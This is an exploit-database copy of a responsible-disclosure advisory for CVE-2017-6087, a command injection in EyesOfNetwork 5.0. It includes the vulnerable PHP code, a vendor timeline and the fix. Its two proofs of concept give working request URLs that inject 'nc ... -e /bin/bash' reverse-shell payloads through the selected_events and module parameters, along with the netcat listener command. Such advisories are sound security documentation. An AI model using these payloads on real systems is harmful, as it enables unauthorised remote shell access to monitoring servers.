bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/exploits/php/webapps/41746.md
Offensive Security b4c96a5864 DB: 2021-09-03 
28807 changes to exploits/shellcodes
2021-09-03 20:19:21 +00:00

3.2 KiB
Raw Blame History

[CVE-2017-6087] EON 5.0 Remote Code Execution

Description

EyesOfNetwork ("EON") is an OpenSource network monitoring solution.

Remote Code Execution (authenticated)

The Eonweb code does not correctly filter arguments, allowing authenticated users to execute arbitrary code.

CVE ID: CVE-2017-6087

Access Vector: remote

Security Risk: high

Vulnerability: CWE-78

CVSS Base Score: 7.6

CVSS Vector String: CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:L/A:L

Proof of Concept 1

On the attacker's host, we start a handler:

nc -lvp 1337

The selected_events parameter is not correctly filtered before it is used by the shell_exec() function.

There, it is possible to inject a payload like in the request below, where we connect back to our handler:

https://eonweb.local/module/monitoring_ged/ged_actions.php?queue=history&action=confirm&global_action=4&selected_events%5B%5D=;nc%2010.0.5.124%201337%20-e%20/bin/bash;

Vulnerable code

The payload gets injected into the $event[$key] and $ged_command variables of the module/monitoring_ged/ged_functions.php file, line 373:

$ged_command = "-update -type $ged_type_nbr ";
foreach ($array_ged_packets as $key => $value) {
  if($value["type"] == true){
    if($key == "owner"){
      $event[$key] = $owner;
    }
    $ged_command .= "\"".$event[$key]."\" ";
  }
}
$ged_command = trim($ged_command, " ");
shell_exec($path_ged_bin." ".$ged_command);

Two other functions in this file are also affected by this problem:

  • delete($selected_events, $queue);
  • ownDisown($selected_events, $queue, $global_action);

Proof of Concept 2

On the attacker's host, we start a handler:

nc -lvp 1337

The module parameter is not correctly filtered before it is used by the shell_exec() function.

Again, we inject our connecting back payload:

https://eonweb.local/module/index.php?module=|nc%20192.168.1.14%201337%20-e%20/bin/bash&link=padding

Vulnerable code

In the module/index.php file, line 24, we can see that our payload is injected into the exec() function without any sanitization:

# Check optionnal module to load
if(isset($_GET["module"]) && isset($_GET["link"])) {

	$module=exec("rpm -q ".$_GET["module"]." |grep '.eon' |wc -l");

	# Redirect to module page if rpm installed
	if($module!=0) { header('Location: '.$_GET["link"].''); }

}

Timeline (dd/mm/yyyy)

  • 01/10/2016 : Initial discovery.
  • 09/10/2016 : Fisrt contact with vendor.
  • 23/10/2016 : Technical details sent to the security contact.
  • 27/10/2016 : Vendor akwnoledgement and first patching attempt.
  • 11/10/2016 : Testing the patch revealed that it needed more work.
  • 16/02/2017 : New tests done on release candidate 5.1. Fix confirmed.
  • 26/02/2017 : 5.1 release. Waiting for 2 weeks according to our repsonsible disclosure agreement.
  • 14/03/2017 : Public disclosure.

Thank you to EON for the fast response.

Solution

Update to version 5.1

Affected versions

  • Version <= 5.0

Credits

-- SYSDREAM Labs labs@sysdream.com GPG : 47D1 E124 C43E F992 2A2E 1551 8EB4 8CD9 D5B2 59A1